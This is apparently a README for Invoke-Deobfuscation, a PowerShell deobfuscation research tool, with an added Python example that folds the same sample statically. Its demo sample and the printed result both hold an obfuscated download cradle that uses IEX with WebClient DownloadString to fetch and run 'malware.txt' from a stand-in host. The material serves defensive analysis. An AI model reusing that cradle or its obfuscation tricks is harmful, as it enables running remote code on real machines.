# Invoke-Deobfuscation

**Repository Path**: snowroll/invoke-deobfuscation

## Basic Information

- **Project Name**: Invoke-Deobfuscation
- **Description**: Deobfuscation tool for PowerShell
- **Primary Language**: PowerShell
- **License**: GPL-2.0
- **Default Branch**: main
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 9
- **Forks**: 1
- **Created**: 2022-03-21
- **Last Updated**: 2024-12-16

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

### Invoke-Deobfuscation

---

- Environment
  - Windows: PowerShell Shell
  - Linux: pwsh https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-linux?view=powershell-7.2
  - MacOS: pwsh https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.2

- How to use it?

  ~~~shell
  git clone https://gitee.com/snowroll/invoke-deobfuscation
  cd invoke-deobfuscation/Code
  pwsh  # Linux or MacOS
  Import-Module ./Invoke-DeObfuscation.psd1
  DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1
  ~~~

- Case Study
  - demo.ps1

    ~~~powershell
    Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
    $xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
    $lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
    $sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
    .($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
    ~~~

  - Result

    ~~~powershell
    Write-Host hello
    $var0 = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
    $var1 = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
    $var2 = 'https://test.com/malware.txt'
    .('iex') (New-Object net.webclient).downloadstring('https://test.com/malware.txt')
    ~~~

- DataSet Request

  If you want the dataset (3346 highly obfuscated samples), please send me an email. My email address is chaihuajun@qianxin.com. There are some requirements for the email as follows.

  - You need to send me an email with a copy to both my mentor yinglingyun@qianxin.com and your mentor.
  - In the body of the email, you need to state the purpose of the dataset request and the use of the dataset.
  - Moreover, you need to clearly indicate that the results generated by the dataset will cite our paper.

  The full dataset is not public. If you would like to collaborate on research, please feel free to contact us.

- Citation

  ~~~
  @inproceedings{chai2022invoke,
    title={Invoke-Deobfuscation: AST-Based and Semantics-Preserving Deobfuscation for PowerShell Scripts},
    author={Chai, Huajun and Ying, Lingyun and Duan, Haixin and Zha, Daren},
    booktitle={2022 52nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN)},
    pages={295--306},
    year={2022},
    organization={IEEE}
  }
  ~~~
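
The layers in the Case Study's demo.ps1 (backtick escapes, a reordered `-f` format string, `$PSHOME` character indexing, and a Base64 string split across two variables) can each be folded statically, as in this added Python example; it is not code from the Invoke-Deobfuscation project and uses regexes rather than the tool's AST approach. The sample is a constructed copy of demo.ps1 handled as inert text, and the `PSHOME` value is an assumption (the default install path of Windows PowerShell 5.1).

```python
import base64
import re

# Constructed copy of the README's demo.ps1, held as inert text and never executed.
DEMO = r'''Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
$xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
.($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
'''

# Assumption: default $PSHOME of Windows PowerShell 5.1; other hosts index other characters.
PSHOME = r'C:\Windows\System32\WindowsPowerShell\v1.0'

def strip_ticks(text):
    """Drop backticks before letters that do not form an escape such as `n or `t."""
    return re.sub(r'`(?![0abefnrtuv])(?=[A-Za-z])', '', text)

def fold_format(text):
    """Evaluate ("fmt" -f 'a', 'b', ...) when every operand is a string literal."""
    pat = re.compile(r'''\(\s*"([^"]*)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)''', re.I)
    def repl(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        return "'" + re.sub(r'\{(\d+)\}', lambda i: args[int(i.group(1))], m.group(1)) + "'"
    return pat.sub(repl, text)

def fold_pshome(text, pshome=PSHOME):
    """Turn $PSHOME[i] into a quoted character, then join adjacent 'a'+'b' literals."""
    text = re.sub(r'\$pshome\[(\d+)\]', lambda m: "'" + pshome[int(m.group(1))] + "'", text, flags=re.I)
    joined = re.compile(r"'([^'\n]*)'[ \t]*\+[ \t]*'([^'\n]*)'")
    while joined.search(text):
        text = joined.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text, count=1)
    return text

def decode_b64_concat(text):
    """Resolve FromBase64String($a + $b) from literal assignments; Unicode means UTF-16LE."""
    consts = {k.lower(): v for k, v in re.findall(r"\$(\w+)\s*=\s*'([^']*)'", text)}
    call = re.search(r'FromBase64String\(([^)]*)\)', text, re.I)
    blob = ''.join(consts[n.lower()] for n in re.findall(r'\$(\w+)', call.group(1)))
    return base64.b64decode(blob).decode('utf-16-le')

def deobfuscate(text):
    """Return (folded script text, decoded download URL)."""
    folded = fold_pshome(fold_format(strip_ticks(text)))
    return folded, decode_b64_concat(folded)

if __name__ == '__main__':
    script, url = deobfuscate(DEMO)
    print(script, 'decoded string: ' + url, sep='\n')
```

The folded output agrees with the README's Result on the `.('iex')` call and the decoded URL; the command-name case normalisation and variable renaming shown in that Result are not reproduced here.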